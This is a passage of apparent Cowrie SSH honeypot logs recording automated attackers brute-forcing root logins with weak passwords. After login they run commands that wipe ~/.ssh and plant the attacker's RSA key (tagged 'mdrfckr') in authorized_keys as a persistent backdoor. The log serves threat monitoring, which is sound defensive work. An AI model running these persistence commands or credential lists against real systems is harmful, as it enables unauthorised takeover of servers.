sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T23:35:56.953854Z","src_ip":"212.227.125.160","session":"cd90b971d521"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:35:56.955317Z","src_ip":"212.227.125.160","session":"cd90b971d521"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":36224,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b0a1c10721a","protocol":"ssh","message":"New connection: 46.101.8.63:36224 (1.2.3.4:22) [session: 0b0a1c10721a]","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.651018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.652042Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.675468Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.login.success","username":"root","password":"RootPass","message":"login attempt [root/RootPass] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.811903Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:09.919408Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.920244Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.921000Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:09.945708Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:10.011154Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.012079Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.038904Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.039868Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":36388,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6098a13f8c1","protocol":"ssh","message":"New connection: 46.101.8.63:36388 (1.2.3.4:22) [session: e6098a13f8c1]","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.059024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.059789Z","src_ip":"46.101.8.63","session":"e6098a13f8c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.081334Z","src_ip":"46.101.8.63","session":"e6098a13f8c1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.208108Z","src_ip":"46.101.8.63","session":"e6098a13f8c1"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":43258,"dst_ip":"1.2.3.4","dst_port":22,"session":"f99c64d3b603","protocol":"ssh","message":"New connection: 93.113.63.124:43258 (1.2.3.4:22) [session: f99c64d3b603]","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.546553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.583984Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.654935Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.login.success","username":"root","password":"password!","message":"login attempt [root/password!] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:10.992364Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:11.213517Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.214196Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.215192Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.238442Z","src_ip":"46.101.8.63","session":"e6098a13f8c1"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":37102,"dst_ip":"1.2.3.4","dst_port":22,"session":"aca46ec78f91","protocol":"ssh","message":"New connection: 46.101.8.63:37102 (1.2.3.4:22) [session: aca46ec78f91]","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.260298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.261156Z","src_ip":"46.101.8.63","session":"aca46ec78f91"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.284269Z","src_ip":"46.101.8.63","session":"aca46ec78f91"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.363811Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.418923Z","src_ip":"46.101.8.63","session":"aca46ec78f91"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.443272Z","src_ip":"46.101.8.63","session":"0b0a1c10721a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.444210Z","src_ip":"46.101.8.63","session":"aca46ec78f91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:11.526571Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.527291Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.606227Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.607219Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":43262,"dst_ip":"1.2.3.4","dst_port":22,"session":"78373fc7081e","protocol":"ssh","message":"New connection: 93.113.63.124:43262 (1.2.3.4:22) [session: 78373fc7081e]","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.655975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.656745Z","src_ip":"93.113.63.124","session":"78373fc7081e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:11.717976Z","src_ip":"93.113.63.124","session":"78373fc7081e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:36:12.025736Z","src_ip":"93.113.63.124","session":"78373fc7081e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.090002Z","src_ip":"93.113.63.124","session":"78373fc7081e"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":43268,"dst_ip":"1.2.3.4","dst_port":22,"session":"12925737dfcb","protocol":"ssh","message":"New connection: 93.113.63.124:43268 (1.2.3.4:22) [session: 12925737dfcb]","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.171496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.172181Z","src_ip":"93.113.63.124","session":"12925737dfcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.312635Z","src_ip":"93.113.63.124","session":"12925737dfcb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.668148Z","src_ip":"93.113.63.124","session":"12925737dfcb"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.741031Z","src_ip":"93.113.63.124","session":"f99c64d3b603"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:13.741908Z","src_ip":"93.113.63.124","session":"12925737dfcb"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":59320,"dst_ip":"1.2.3.4","dst_port":22,"session":"b217c72e139c","protocol":"ssh","message":"New connection: 182.18.161.165:59320 (1.2.3.4:22) [session: b217c72e139c]","sensor":"my-vps","timestamp":"2025-09-08T23:36:18.568214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:18.569245Z","src_ip":"182.18.161.165","session":"b217c72e139c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:18.822153Z","src_ip":"182.18.161.165","session":"b217c72e139c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58850,"dst_ip":"1.2.3.4","dst_port":22,"session":"9086a2fb69b7","protocol":"ssh","message":"New connection: 212.227.235.229:58850 (1.2.3.4:22) [session: 9086a2fb69b7]","sensor":"my-vps","timestamp":"2025-09-08T23:36:18.924527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:18.925154Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
